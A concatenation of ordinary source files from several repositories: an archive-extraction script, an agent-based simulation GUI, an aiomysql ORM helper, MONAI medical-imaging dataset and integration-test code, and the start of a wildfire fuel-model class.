os.chdir(PATH_7z_EXE)# 7z.exe path
cmd = '7z.exe x "{}" -o{} -aos -r'.format(rar_path,un_path);
os.system(cmd)
os.chdir(_cwd)
else:
print ("%s is not 7-zip file"%rar_path)
def unzip_SZL2():
"""
unzip all snap_level_spot.7z file
Parameters
----------
Returns
-------
"""
print (os.getcwd())
for root, dirnames, filenames in os.walk(input_dir):
for filename in filenames:
#print filename.endswith(suffix)
if not filename.endswith(molde+".7z.001"):
continue
path=os.getcwd()+root[1:]+"\\"
print(path)
unzip_7z(path,filename)
def load_SZL2(code_list):
for root, dirnames, filenames in os.walk(input_dir):
for filename in filenames[:2]:
#print filename.endswith(suffix)
if not filename.endswith(molde+".txt"):
continue
filenamepath = os.path.join(root, filename)
print ("\n",filenamepath)
infile=open(filenamepath,'r')
Contents=[]
for line in infile:
try:
lines=line.split('\t')
codekey=lines[6]
#print codekey
if codekey in code_list:
Contents.append(line)
except Exception as e:
print (e)
try:
roots=root.split('\\')
for i in roots:
if i.isdigit() and len(i)==4:
date=i
filenames=filename.split('.txt')
#print filenames[0],roots[-1]
outfile='%s_%s.man' %(filenames[0],date)
outfid=open(os.path.join(output_dir, outfile),'w')
print(Contents)
for line in Contents:
try:
outfid.write(line)
except Exception as e:
print (e)
outfid.close()
except Exception as e:
print (e)
def init_level2():
"""
ๅฆๆ้่ฆๅฏผๅ
ฅๅค้จๆไปถ
Parameters
----------
Returns
-------
"""
if len(sys.argv) < 2:
print ("python GetSHL2Snapshot.py outdir codefile")
sys.exit(1)
print (len(sys.argv))
output_dir=sys.argv[1]
print (output_dir)
codefile=sys.argv[2]
try:
infile=open(codefile,'r')
except:
print ("wrong code list file")
sys.exit(1)
for line in infile:
line=line.strip()
codeList.append(line)
return codeList
if __name__ == '__main__':
#codeList=init_level2()
codeList=["000001"]
load_SZL2(codeList)
``` |
{
"source": "johnztoth/guiwebscraping",
"score": 3
} |
#### File: johnztoth/guiwebscraping/gui.py
```python
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot
import matplotlib.animation
import agentframeworkweb
import random
import tkinter
import requests
import bs4
num_of_agents = 10
num_of_iterations = 10
neighbourhood = 10
no_rows=100
no_cols=100
agents = []
shuffled = []
environment=[]
fig = matplotlib.pyplot.figure(figsize=(7, 7))
ax = fig.add_axes([0, 0, 1, 1])
""" create flat environment """
for i in range(1, no_rows):
rowlist=[]
for j in range(1, no_cols):
rowlist.append(100)
environment.append(rowlist)
""" import starting positions from webpage """
r = requests.get('https://www.geog.leeds.ac.uk/courses/computing/practicals/python/agent-framework/part9/data.html')
content = r.text
soup = bs4.BeautifulSoup(content, 'html.parser')
td_ys = soup.find_all(attrs={"class" : "y"})
td_xs = soup.find_all(attrs={"class" : "x"})
""" Make the agents using the Agent class """
for i in range(num_of_agents):
y = int(td_ys[i].text)
x = int(td_xs[i].text)
agents.append(agentframeworkweb.Agent(environment, agents, y, x))
def update(frame_number):
print("frame_number = ", frame_number)
print("num_of_iterations = ", num_of_iterations)
fig.clear()
""" Move the agents, eat the environment, and share if necessary """
for j in range(num_of_iterations):
shuffled = random.sample(agents,len(agents)) # create a new shuffled list
for i in range(num_of_agents):
shuffled[i].move()
shuffled[i].eat()
shuffled[i].share_with_neighbours(neighbourhood)
""" plot agent positions and environment """
for i in range(num_of_agents):
matplotlib.pyplot.xlim(0, no_cols-1)
matplotlib.pyplot.ylim(0, no_rows-1)
matplotlib.pyplot.imshow(environment)
matplotlib.pyplot.scatter(agents[i].x,agents[i].y,color="red")
""" gui """
num_of_frames = 50
def run():
animation = matplotlib.animation.FuncAnimation(fig, update, frames=num_of_frames, repeat=False)
canvas.draw()
root = tkinter.Tk()
root.wm_title("Model")
canvas = matplotlib.backends.backend_tkagg.FigureCanvasTkAgg(fig, master=root)
canvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)
menu_bar = tkinter.Menu(root)
root.config(menu=menu_bar)
model_menu = tkinter.Menu(menu_bar)
menu_bar.add_cascade(label="Model", menu=model_menu)
model_menu.add_command(label="Run model", command=run)
tkinter.mainloop()
``` |
{
"source": "johnzzu/python3-web",
"score": 3
} |
#### File: python3-web/www/orm.py
```python
import asyncio
import aiomysql
import logging
logging.basicConfig(logging.INFO)
@asyncio.coroutine
def create_pool(loop, **kw):
logging.info('create database connection pool...')
global __pool
__pool = yield from aiomysql.create_pool(
host=kw.get('host', 'localhost'),
port=kw.get('port', 3306),
user=kw['user'],
password=kw['password'],
db=kw['db'],
charset=kw.get('charset', 'utf8'),
autocommit=kw.get('autocommit', True),
maxsize=kw.get('maxsize', 10),
minsize=kw.get('minsize', 1),
loop=loop
)
@asyncio.coroutine
def select(sql, args, size=None):
logging.info(sql, args)
global __pool
with (yield from __pool) as conn:
cursor = yield from conn.cursor(aiomysql.DictCursor)
yield from cursor.execute(sql.replace('?', '%s'), args or ())
if size:
rs = yield from cursor.fetchmany(size)
else:
rs = yield from cursor.fetchall()
yield from cursor.close()
logging.info('rows returned: %s' % len(rs))
return rs
@asyncio.coroutine
def execute(sql, args):
logging.info(sql)
with (yield from __pool) as conn:
try:
cursor = yield from conn.cursor()
yield from cursor.execute(sql.replace('?', '%s'), args or ())
affected = cursor.rowcount
yield from cursor.close()
except Exception as e:
raise e
return affected
``` |
{
"source": "joho84/MONAI",
"score": 2
} |
#### File: monai/apps/datasets.py
```python
import os
import sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
from monai.apps.utils import download_and_extract
from monai.data import (
CacheDataset,
load_decathlon_datalist,
load_decathlon_properties,
partition_dataset,
select_cross_validation_folds,
)
from monai.transforms import LoadNiftid, LoadPNGd, Randomizable
from monai.utils import ensure_tuple
class MedNISTDataset(Randomizable, CacheDataset):
"""
The Dataset to automatically download MedNIST data and generate items for training, validation or test.
It's based on `CacheDataset` to accelerate the training process.
Args:
root_dir: target directory to download and load MedNIST dataset.
section: expected data section, can be: `training`, `validation` or `test`.
transform: transforms to execute operations on input data. the default transform is `LoadPNGd`,
which can load data into numpy array with [H, W] shape. for further usage, use `AddChanneld`
to convert the shape to [C, H, W, D].
download: whether to download and extract the MedNIST from resource link, default is False.
if expected file already exists, skip downloading even set it to True.
user can manually copy `MedNIST.tar.gz` file or `MedNIST` folder to root directory.
seed: random seed to randomly split training, validation and test datasets, default is 0.
val_frac: percentage of of validation fraction in the whole dataset, default is 0.1.
test_frac: percentage of of test fraction in the whole dataset, default is 0.1.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker threads to use.
if 0 a single thread will be used. Default is 0.
Raises:
ValueError: When ``root_dir`` is not a directory.
RuntimeError: When ``dataset_dir`` doesn't exist and downloading is not selected (``download=False``).
"""
resource = "https://www.dropbox.com/s/5wwskxctvcxiuea/MedNIST.tar.gz?dl=1"
md5 = "0bc7306e7427e00ad1c5526a6677552d"
compressed_file_name = "MedNIST.tar.gz"
dataset_folder_name = "MedNIST"
def __init__(
self,
root_dir: str,
section: str,
transform: Union[Sequence[Callable], Callable] = (),
download: bool = False,
seed: int = 0,
val_frac: float = 0.1,
test_frac: float = 0.1,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: int = 0,
) -> None:
if not os.path.isdir(root_dir):
raise ValueError("Root directory root_dir must be a directory.")
self.section = section
self.val_frac = val_frac
self.test_frac = test_frac
self.set_random_state(seed=seed)
tarfile_name = os.path.join(root_dir, self.compressed_file_name)
dataset_dir = os.path.join(root_dir, self.dataset_folder_name)
if download:
download_and_extract(self.resource, tarfile_name, root_dir, self.md5)
if not os.path.exists(dataset_dir):
raise RuntimeError(
f"Cannot find dataset directory: {dataset_dir}, please use download=True to download it."
)
data = self._generate_data_list(dataset_dir)
if transform == ():
transform = LoadPNGd("image")
super().__init__(data, transform, cache_num=cache_num, cache_rate=cache_rate, num_workers=num_workers)
def randomize(self, data: Optional[Any] = None) -> None:
self.rann = self.R.random()
def _generate_data_list(self, dataset_dir: str) -> List[Dict]:
"""
Raises:
ValueError: When ``section`` is not one of ["training", "validation", "test"].
"""
class_names = sorted((x for x in os.listdir(dataset_dir) if os.path.isdir(os.path.join(dataset_dir, x))))
num_class = len(class_names)
image_files = [
[
os.path.join(dataset_dir, class_names[i], x)
for x in os.listdir(os.path.join(dataset_dir, class_names[i]))
]
for i in range(num_class)
]
num_each = [len(image_files[i]) for i in range(num_class)]
image_files_list = []
image_class = []
for i in range(num_class):
image_files_list.extend(image_files[i])
image_class.extend([i] * num_each[i])
num_total = len(image_class)
data = list()
for i in range(num_total):
self.randomize()
if self.section == "training":
if self.rann < self.val_frac + self.test_frac:
continue
elif self.section == "validation":
if self.rann >= self.val_frac:
continue
elif self.section == "test":
if self.rann < self.val_frac or self.rann >= self.val_frac + self.test_frac:
continue
else:
raise ValueError(
f'Unsupported section: {self.section}, available options are ["training", "validation", "test"].'
)
data.append({"image": image_files_list[i], "label": image_class[i]})
return data
class DecathlonDataset(Randomizable, CacheDataset):
"""
The Dataset to automatically download the data of Medical Segmentation Decathlon challenge
(http://medicaldecathlon.com/) and generate items for training, validation or test.
It will also load these properties from the JSON config file of dataset. user can call `get_properties()`
to get specified properties or all the properties loaded.
It's based on :py:class:`monai.data.CacheDataset` to accelerate the training process.
Args:
root_dir: user's local directory for caching and loading the MSD datasets.
task: which task to download and execute: one of list ("Task01_BrainTumour", "Task02_Heart",
"Task03_Liver", "Task04_Hippocampus", "Task05_Prostate", "Task06_Lung", "Task07_Pancreas",
"Task08_HepaticVessel", "Task09_Spleen", "Task10_Colon").
section: expected data section, can be: `training`, `validation` or `test`.
transform: transforms to execute operations on input data. the default transform is `LoadNiftid`,
which can load Nifti format data into numpy array with [H, W, D] or [H, W, D, C] shape.
for further usage, use `AddChanneld` or `AsChannelFirstd` to convert the shape to [C, H, W, D].
download: whether to download and extract the Decathlon from resource link, default is False.
if expected file already exists, skip downloading even set it to True.
val_frac: percentage of of validation fraction in the whole dataset, default is 0.2.
user can manually copy tar file or dataset folder to the root directory.
seed: random seed to randomly shuffle the datalist before splitting into training and validation, default is 0.
note to set same seed for `training` and `validation` sections.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker threads to use.
if 0 a single thread will be used. Default is 0.
Raises:
ValueError: When ``root_dir`` is not a directory.
ValueError: When ``task`` is not one of ["Task01_BrainTumour", "Task02_Heart",
"Task03_Liver", "Task04_Hippocampus", "Task05_Prostate", "Task06_Lung", "Task07_Pancreas",
"Task08_HepaticVessel", "Task09_Spleen", "Task10_Colon"].
RuntimeError: When ``dataset_dir`` doesn't exist and downloading is not selected (``download=False``).
Example::
transform = Compose(
[
LoadNiftid(keys=["image", "label"]),
AddChanneld(keys=["image", "label"]),
ScaleIntensityd(keys="image"),
ToTensord(keys=["image", "label"]),
]
)
val_data = DecathlonDataset(
root_dir="./", task="Task09_Spleen", transform=transform, section="validation", seed=12345, download=True
)
print(val_data[0]["image"], val_data[0]["label"])
"""
resource = {
"Task01_BrainTumour": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task01_BrainTumour.tar",
"Task02_Heart": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task02_Heart.tar",
"Task03_Liver": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task03_Liver.tar",
"Task04_Hippocampus": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task04_Hippocampus.tar",
"Task05_Prostate": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task05_Prostate.tar",
"Task06_Lung": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task06_Lung.tar",
"Task07_Pancreas": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task07_Pancreas.tar",
"Task08_HepaticVessel": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task08_HepaticVessel.tar",
"Task09_Spleen": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task09_Spleen.tar",
"Task10_Colon": "https://msd-for-monai.s3-us-west-2.amazonaws.com/Task10_Colon.tar",
}
md5 = {
"Task01_BrainTumour": "240a19d752f0d9e9101544901065d872",
"Task02_Heart": "06ee59366e1e5124267b774dbd654057",
"Task03_Liver": "a90ec6c4aa7f6a3d087205e23d4e6397",
"Task04_Hippocampus": "9d24dba78a72977dbd1d2e110310f31b",
"Task05_Prostate": "35138f08b1efaef89d7424d2bcc928db",
"Task06_Lung": "8afd997733c7fc0432f71255ba4e52dc",
"Task07_Pancreas": "4f7080cfca169fa8066d17ce6eb061e4",
"Task08_HepaticVessel": "641d79e80ec66453921d997fbf12a29c",
"Task09_Spleen": "410d4a301da4e5b2f6f86ec3ddba524e",
"Task10_Colon": "bad7a188931dc2f6acf72b08eb6202d0",
}
def __init__(
self,
root_dir: str,
task: str,
section: str,
transform: Union[Sequence[Callable], Callable] = (),
download: bool = False,
seed: int = 0,
val_frac: float = 0.2,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: int = 0,
) -> None:
if not os.path.isdir(root_dir):
raise ValueError("Root directory root_dir must be a directory.")
self.section = section
self.val_frac = val_frac
self.set_random_state(seed=seed)
if task not in self.resource:
raise ValueError(f"Unsupported task: {task}, available options are: {list(self.resource.keys())}.")
dataset_dir = os.path.join(root_dir, task)
tarfile_name = f"{dataset_dir}.tar"
if download:
download_and_extract(self.resource[task], tarfile_name, root_dir, self.md5[task])
if not os.path.exists(dataset_dir):
raise RuntimeError(
f"Cannot find dataset directory: {dataset_dir}, please use download=True to download it."
)
self.indices: np.ndarray = np.array([])
data = self._generate_data_list(dataset_dir)
# as `release` key has typo in Task04 config file, ignore it.
property_keys = [
"name",
"description",
"reference",
"licence",
"tensorImageSize",
"modality",
"labels",
"numTraining",
"numTest",
]
self._properties = load_decathlon_properties(os.path.join(dataset_dir, "dataset.json"), property_keys)
if transform == ():
transform = LoadNiftid(["image", "label"])
super().__init__(data, transform, cache_num=cache_num, cache_rate=cache_rate, num_workers=num_workers)
def get_indices(self) -> np.ndarray:
"""
Get the indices of datalist used in this dataset.
"""
return self.indices
def randomize(self, data: List[int]) -> None:
self.R.shuffle(data)
def get_properties(self, keys: Optional[Union[Sequence[str], str]] = None):
"""
Get the loaded properties of dataset with specified keys.
If no keys specified, return all the loaded properties.
"""
if keys is None:
return self._properties
elif self._properties is not None:
return {key: self._properties[key] for key in ensure_tuple(keys)}
else:
return {}
def _generate_data_list(self, dataset_dir: str) -> List[Dict]:
section = "training" if self.section in ["training", "validation"] else "test"
datalist = load_decathlon_datalist(os.path.join(dataset_dir, "dataset.json"), True, section)
return self._split_datalist(datalist)
def _split_datalist(self, datalist: List[Dict]) -> List[Dict]:
if self.section == "test":
return datalist
else:
length = len(datalist)
indices = np.arange(length)
self.randomize(indices)
val_length = int(length * self.val_frac)
if self.section == "training":
self.indices = indices[val_length:]
else:
self.indices = indices[:val_length]
return [datalist[i] for i in self.indices]
class CrossValidation:
"""
Cross validation dataset based on the general dataset which must have `_split_datalist` API.
Args:
dataset_cls: dataset class to be used to create the cross validation partitions.
It must have `_split_datalist` API.
nfolds: number of folds to split the data for cross validation.
seed: random seed to randomly shuffle the datalist before splitting into N folds, default is 0.
dataset_params: other additional parameters for the dataset_cls base class.
Example of 5 folds cross validation training::
cvdataset = CrossValidation(
dataset_cls=DecathlonDataset,
nfolds=5,
seed=12345,
root_dir="./",
task="Task09_Spleen",
section="training",
download=True,
)
dataset_fold0_train = cvdataset.get_dataset(folds=[1, 2, 3, 4])
dataset_fold0_val = cvdataset.get_dataset(folds=0)
# execute training for fold 0 ...
dataset_fold1_train = cvdataset.get_dataset(folds=[1])
dataset_fold1_val = cvdataset.get_dataset(folds=[0, 2, 3, 4])
# execute training for fold 1 ...
...
dataset_fold4_train = ...
# execute training for fold 4 ...
"""
def __init__(
self,
dataset_cls,
nfolds: int = 5,
seed: int = 0,
**dataset_params,
) -> None:
if not hasattr(dataset_cls, "_split_datalist"):
raise ValueError("dataset class must have _split_datalist API.")
self.dataset_cls = dataset_cls
self.nfolds = nfolds
self.seed = seed
self.dataset_params = dataset_params
def get_dataset(self, folds: Union[Sequence[int], int]):
"""
Generate dataset based on the specified fold indice in the cross validation group.
Args:
folds: index of folds for training or validation, if a list of values, concatenate the data.
"""
nfolds = self.nfolds
seed = self.seed
class _NsplitsDataset(self.dataset_cls): # type: ignore
def _split_datalist(self, datalist: List[Dict]) -> List[Dict]:
data = partition_dataset(data=datalist, num_partitions=nfolds, shuffle=True, seed=seed)
return select_cross_validation_folds(partitions=data, folds=folds)
return _NsplitsDataset(**self.dataset_params)
```
#### File: MONAI/tests/test_integration_workflows.py
```python
import logging
import os
import shutil
import sys
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
from ignite.metrics import Accuracy
import monai
from monai.data import create_test_image_3d
from monai.engines import SupervisedEvaluator, SupervisedTrainer
from monai.handlers import (
CheckpointLoader,
CheckpointSaver,
LrScheduleHandler,
MeanDice,
SegmentationSaver,
StatsHandler,
TensorBoardImageHandler,
TensorBoardStatsHandler,
ValidationHandler,
)
from monai.inferers import SimpleInferer, SlidingWindowInferer
from monai.transforms import (
Activationsd,
AsChannelFirstd,
AsDiscreted,
Compose,
KeepLargestConnectedComponentd,
LoadNiftid,
RandCropByPosNegLabeld,
RandRotate90d,
ScaleIntensityd,
ToTensord,
)
from monai.utils import set_determinism
from tests.utils import skip_if_quick
def run_training_test(root_dir, device="cuda:0", amp=False):
images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
segs = sorted(glob(os.path.join(root_dir, "seg*.nii.gz")))
train_files = [{"image": img, "label": seg} for img, seg in zip(images[:20], segs[:20])]
val_files = [{"image": img, "label": seg} for img, seg in zip(images[-20:], segs[-20:])]
# define transforms for image and segmentation
train_transforms = Compose(
[
LoadNiftid(keys=["image", "label"]),
AsChannelFirstd(keys=["image", "label"], channel_dim=-1),
ScaleIntensityd(keys=["image", "label"]),
RandCropByPosNegLabeld(
keys=["image", "label"], label_key="label", spatial_size=[96, 96, 96], pos=1, neg=1, num_samples=4
),
RandRotate90d(keys=["image", "label"], prob=0.5, spatial_axes=[0, 2]),
ToTensord(keys=["image", "label"]),
]
)
val_transforms = Compose(
[
LoadNiftid(keys=["image", "label"]),
AsChannelFirstd(keys=["image", "label"], channel_dim=-1),
ScaleIntensityd(keys=["image", "label"]),
ToTensord(keys=["image", "label"]),
]
)
# create a training data loader
train_ds = monai.data.CacheDataset(data=train_files, transform=train_transforms, cache_rate=0.5)
# use batch_size=2 to load images and use RandCropByPosNegLabeld to generate 2 x 4 images for network training
train_loader = monai.data.DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)
# create a validation data loader
val_ds = monai.data.CacheDataset(data=val_files, transform=val_transforms, cache_rate=1.0)
val_loader = monai.data.DataLoader(val_ds, batch_size=1, num_workers=4)
# create UNet, DiceLoss and Adam optimizer
net = monai.networks.nets.UNet(
dimensions=3,
in_channels=1,
out_channels=1,
channels=(16, 32, 64, 128, 256),
strides=(2, 2, 2, 2),
num_res_units=2,
).to(device)
loss = monai.losses.DiceLoss(sigmoid=True)
opt = torch.optim.Adam(net.parameters(), 1e-3)
lr_scheduler = torch.optim.lr_scheduler.StepLR(opt, step_size=2, gamma=0.1)
val_post_transforms = Compose(
[
Activationsd(keys="pred", sigmoid=True),
AsDiscreted(keys="pred", threshold_values=True),
KeepLargestConnectedComponentd(keys="pred", applied_labels=[1]),
]
)
val_handlers = [
StatsHandler(output_transform=lambda x: None),
TensorBoardStatsHandler(log_dir=root_dir, output_transform=lambda x: None),
TensorBoardImageHandler(
log_dir=root_dir, batch_transform=lambda x: (x["image"], x["label"]), output_transform=lambda x: x["pred"]
),
CheckpointSaver(save_dir=root_dir, save_dict={"net": net}, save_key_metric=True),
]
evaluator = SupervisedEvaluator(
device=device,
val_data_loader=val_loader,
network=net,
inferer=SlidingWindowInferer(roi_size=(96, 96, 96), sw_batch_size=4, overlap=0.5),
post_transform=val_post_transforms,
key_val_metric={
"val_mean_dice": MeanDice(include_background=True, output_transform=lambda x: (x["pred"], x["label"]))
},
additional_metrics={"val_acc": Accuracy(output_transform=lambda x: (x["pred"], x["label"]))},
val_handlers=val_handlers,
amp=True if amp else False,
)
train_post_transforms = Compose(
[
Activationsd(keys="pred", sigmoid=True),
AsDiscreted(keys="pred", threshold_values=True),
KeepLargestConnectedComponentd(keys="pred", applied_labels=[1]),
]
)
train_handlers = [
LrScheduleHandler(lr_scheduler=lr_scheduler, print_lr=True),
ValidationHandler(validator=evaluator, interval=2, epoch_level=True),
StatsHandler(tag_name="train_loss", output_transform=lambda x: x["loss"]),
TensorBoardStatsHandler(log_dir=root_dir, tag_name="train_loss", output_transform=lambda x: x["loss"]),
CheckpointSaver(save_dir=root_dir, save_dict={"net": net, "opt": opt}, save_interval=2, epoch_level=True),
]
trainer = SupervisedTrainer(
device=device,
max_epochs=5,
train_data_loader=train_loader,
network=net,
optimizer=opt,
loss_function=loss,
inferer=SimpleInferer(),
post_transform=train_post_transforms,
key_train_metric={"train_acc": Accuracy(output_transform=lambda x: (x["pred"], x["label"]))},
train_handlers=train_handlers,
amp=True if amp else False,
)
trainer.run()
return evaluator.state.best_metric
def run_inference_test(root_dir, model_file, device="cuda:0", amp=False):
images = sorted(glob(os.path.join(root_dir, "im*.nii.gz")))
segs = sorted(glob(os.path.join(root_dir, "seg*.nii.gz")))
val_files = [{"image": img, "label": seg} for img, seg in zip(images, segs)]
# define transforms for image and segmentation
val_transforms = Compose(
[
LoadNiftid(keys=["image", "label"]),
AsChannelFirstd(keys=["image", "label"], channel_dim=-1),
ScaleIntensityd(keys=["image", "label"]),
ToTensord(keys=["image", "label"]),
]
)
# create a validation data loader
val_ds = monai.data.Dataset(data=val_files, transform=val_transforms)
val_loader = monai.data.DataLoader(val_ds, batch_size=1, num_workers=4)
# create UNet, DiceLoss and Adam optimizer
net = monai.networks.nets.UNet(
dimensions=3,
in_channels=1,
out_channels=1,
channels=(16, 32, 64, 128, 256),
strides=(2, 2, 2, 2),
num_res_units=2,
).to(device)
val_post_transforms = Compose(
[
Activationsd(keys="pred", sigmoid=True),
AsDiscreted(keys="pred", threshold_values=True),
KeepLargestConnectedComponentd(keys="pred", applied_labels=[1]),
]
)
val_handlers = [
StatsHandler(output_transform=lambda x: None),
CheckpointLoader(load_path=f"{model_file}", load_dict={"net": net}),
SegmentationSaver(
output_dir=root_dir,
batch_transform=lambda batch: batch["image_meta_dict"],
output_transform=lambda output: output["pred"],
),
]
evaluator = SupervisedEvaluator(
device=device,
val_data_loader=val_loader,
network=net,
inferer=SlidingWindowInferer(roi_size=(96, 96, 96), sw_batch_size=4, overlap=0.5),
post_transform=val_post_transforms,
key_val_metric={
"val_mean_dice": MeanDice(include_background=True, output_transform=lambda x: (x["pred"], x["label"]))
},
additional_metrics={"val_acc": Accuracy(output_transform=lambda x: (x["pred"], x["label"]))},
val_handlers=val_handlers,
amp=True if amp else False,
)
evaluator.run()
return evaluator.state.best_metric
class IntegrationWorkflows(unittest.TestCase):
def setUp(self):
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(40):
im, seg = create_test_image_3d(128, 128, 128, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
n = nib.Nifti1Image(seg, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"seg{i:d}.nii.gz"))
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu:0")
monai.config.print_config()
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
@skip_if_quick
def test_training(self):
repeated = []
test_rounds = 3 if monai.config.get_torch_version_tuple() >= (1, 6) else 2
for i in range(test_rounds):
set_determinism(seed=0)
repeated.append([])
best_metric = run_training_test(self.data_dir, device=self.device, amp=(i == 2))
print("best metric", best_metric)
if i == 2:
np.testing.assert_allclose(best_metric, 0.9219996750354766, rtol=1e-2)
else:
np.testing.assert_allclose(best_metric, 0.921965891122818, rtol=1e-2)
repeated[i].append(best_metric)
model_file = sorted(glob(os.path.join(self.data_dir, "net_key_metric*.pt")))[-1]
infer_metric = run_inference_test(self.data_dir, model_file, device=self.device, amp=(i == 2))
print("infer metric", infer_metric)
# check inference properties
if i == 2:
np.testing.assert_allclose(infer_metric, 0.9217855930328369, rtol=1e-2)
else:
np.testing.assert_allclose(infer_metric, 0.9217526227235794, rtol=1e-2)
repeated[i].append(infer_metric)
output_files = sorted(glob(os.path.join(self.data_dir, "img*", "*.nii.gz")))
if i == 2:
sums = [
0.14183807373046875,
0.15151405334472656,
0.13811445236206055,
0.1336650848388672,
0.1842341423034668,
0.16353750228881836,
0.14104795455932617,
0.16643333435058594,
0.15668964385986328,
0.1764383316040039,
0.16112232208251953,
0.1641840934753418,
0.14401578903198242,
0.11075973510742188,
0.16075706481933594,
0.19603967666625977,
0.1743607521057129,
0.05361223220825195,
0.19009971618652344,
0.19875097274780273,
0.19498729705810547,
0.2027440071105957,
0.16035127639770508,
0.13188838958740234,
0.15143728256225586,
0.1370086669921875,
0.22630071640014648,
0.16111421585083008,
0.14713764190673828,
0.10443782806396484,
0.11977195739746094,
0.13068008422851562,
0.11225223541259766,
0.15175437927246094,
0.1594991683959961,
0.1894702911376953,
0.21605825424194336,
0.17748403549194336,
0.18474626541137695,
0.03627157211303711,
]
else:
sums = [
0.14183568954467773,
0.15139484405517578,
0.13803958892822266,
0.13356733322143555,
0.18455982208251953,
0.16363763809204102,
0.14090299606323242,
0.16649341583251953,
0.15651702880859375,
0.17655181884765625,
0.1611647605895996,
0.1644759178161621,
0.14383649826049805,
0.11055231094360352,
0.16080236434936523,
0.19629907608032227,
0.17441368103027344,
0.053577423095703125,
0.19043731689453125,
0.19904851913452148,
0.19525957107543945,
0.20304203033447266,
0.16030073165893555,
0.13170528411865234,
0.15118885040283203,
0.13686418533325195,
0.22668886184692383,
0.1611466407775879,
0.1472468376159668,
0.10427331924438477,
0.11962461471557617,
0.1305699348449707,
0.11204767227172852,
0.15171241760253906,
0.1596231460571289,
0.18976259231567383,
0.21649408340454102,
0.17761707305908203,
0.1851673126220703,
0.036365509033203125,
]
for (output, s) in zip(output_files, sums):
ave = np.mean(nib.load(output).get_fdata())
np.testing.assert_allclose(ave, s, rtol=1e-2)
repeated[i].append(ave)
np.testing.assert_allclose(repeated[0], repeated[1])
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "johodges/datadriven-wildfire-spread",
"score": 2
} |
#### File: datadriven-wildfire-spread/scripts/behavePlus.py
```python
import numpy as np
import matplotlib
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
#matplotlib.rcParams['text.usetex'] = True
import matplotlib.pyplot as plt
from PIL import Image, ImageDraw
from scipy.ndimage.interpolation import zoom
import pandas as pd
import util_common as uc
import os
class FuelModel(object):
''' This class contains a fuel model for wildfire spread.
Fields:
Functions:
'''
__slots__ = ['id','code','name',
'fuelBedDepth','moistureOfExtinctionDeadFuel','heatOfCombustionDeadFuel','heatOfCombustionLiveFuel',
'fuelLoad1Hour','fuelLoad10Hour','fuelLoad100Hour','fuelLoadLiveHerb','fuelLoadLiveWood',
'savr1HourFuel','savrLiveHerb','savrLiveWood',
'isDynamic','isReserved']
def __init__(self,idNumber,idCode,idName,
fuelBedDepth,moistureOfExtinctionDeadFuel,heatOfCombustionDeadFuel,heatOfCombustionLiveFuel,
fuelLoad1Hour,fuelLoad10Hour,fuelLoad100Hour,fuelLoadLiveHerb,fuelLoadLiveWood,
savr1HourFuel,savrLiveHerb,savrLiveWood,
isDynamic, isReserved):
self.id = idNumber
self.code = idCode
self.name = idName
self.fuelBedDepth = fuelBedDepth
self.moistureOfExtinctionDeadFuel = moistureOfExtinctionDeadFuel
self.heatOfCombustionDeadFuel = heatOfCombustionDeadFuel
self.heatOfCombustionLiveFuel = heatOfCombustionLiveFuel
self.fuelLoad1Hour = fuelLoad1Hour
self.fuelLoad10Hour = fuelLoad10Hour
self.fuelLoad100Hour = fuelLoad100Hour
self.fuelLoadLiveHerb = fuelLoadLiveHerb
self.fuelLoadLiveWood = fuelLoadLiveWood
self.savr1HourFuel = savr1HourFuel
self.savrLiveHerb = savrLiveHerb
self.savrLiveWood = savrLiveWood
self.isDynamic = isDynamic
self.isReserved = isReserved
def __str__(self):
''' This function prints summary information of the object when a
string is requested.
'''
string = "Fuel Model\n"
string = string + "\tID:\t\t%s\n"%(str(self.id))
string = string + "\tCode:\t%s\n"%(str(self.code))
string = string + "\tName:\t%s\n"%(str(self.name))
return string
def __repr__(self):
''' This function prints summary information of the object when a
string is requested.
'''
return self.__str__()
class lifeStateIntermediate(object):
__slots__ = ['dead','live']
def __init__(self,fuelModel,moistureDead,moistureLive):
savrDead, savrLive = getSAV(fuelModel)
deadFraction, liveFraction, deadFractionTotal, liveFractionTotal = getDLFraction(fuelModel,moistureLive)
loadDead, loadLive = getFuelLoad(fuelModel,moistureLive)
heatCDead, heatCLive = getHeatOfCombustion(fuelModel)
heatDead = np.zeros((len(savrDead),))+heatCDead
heatLive = np.zeros((len(savrLive),))+heatCLive
heatLive[liveFraction == 0] = 0
moistureLive.extend([0,0])
self.dead = self.calculateIntermediates(fuelModel,savrDead,loadDead,deadFraction,heatDead,moistureDead)
